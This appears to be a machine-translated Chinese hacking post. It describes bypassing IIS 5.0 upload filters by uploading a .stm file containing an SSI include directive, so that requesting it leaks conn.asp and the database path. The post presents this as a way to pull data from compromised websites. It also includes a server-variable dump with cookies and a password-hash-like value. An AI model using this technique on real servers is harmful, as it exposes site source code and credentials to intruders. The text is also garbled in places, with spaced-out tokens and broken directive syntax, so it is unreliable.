解决IIS5.0不能上传asp等文件
使用stm上传,您还可以执行程序和代码:
假设将其保存为stm或shtml,并按如下方式运行:
HTTP_ACCEPT:image/gif、image/x-xbitmap、image/jpeg、
image/pjpeg、application/x-shockwave-flash、
application/vnd . ms-PowerPoint、
application/vnd.ms-excel、application/msword、
*/* HTTP _ ACCEPT _ LANGUAGE:zh-cn HTTP _ CONNECTION:Keep-Alive
HTTP _ HOST:localhost HTTP _ USER _ AGENT:Mozilla/4.0MSIE 6.0Windows NT 5.0傲游;。NET CLR 1 . 1 . 4322)
HTTP _ COOKIE:nbblastactivity = 1100263629;bblastvisit = 1100264583
bblastactivity = 1100265530;bb userid = 1;
bb password = 0 f 8514 D1 ed 2 EAA 91 fb9 a 87 a 568 f 6 c 96 f;
aspsessionidatsdrqq = jogdcebdcnkgfmlgdnfhpdhmj
http _ accept _ encoding:gzip,deflate当前文件名:f: web1.stm。
web服务器的名称和版本:Microsoft-IIS/5.0
主机名:localhost
端口:80
客户端或客户端代理IP地址:127.0.0.1
客户端或客户端代理主机名:127.0。但是用一个虚拟路径扩展到一个目录规范:F:Web1.stm
客户端给出附加路径信息:/1.stm
image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,application/vnd.ms-powerpoint,application/vnd.ms-excel,application/msword,*/*
引自Unkown:
当网站不允许上传asp cer cdx htr之类的文件时,上传一个stm文件,内容:
直接请求这个stm文件,conn.asp和数据库路径就一览无余了。
就是上面说的,
<-# include file = " conn . ASP "->
是一个SSI指令,它的作用是将“info.htm”的内容复制到当前页面。当访问者浏览时,他们将看到info.htm的内容和其他HTML文档一样。
我在本地实验成功了!我在我的iis目录下建了一个test.stm文件,内容:
<-# include file = " conn . ASP "->
我的另一个木马文件也放在同一个目录下。ok.asp在浏览器中请求test.stm,但是没有响应,白到空。但是我看着源代码就头晕。原来是我的asp文件的内容!这样我们就可以用这个来获取被入侵的web的conn文件来获取数据库路径,但是一个前提条件是服务器的扩展名为stm或者shtml没有被删除!
0条评论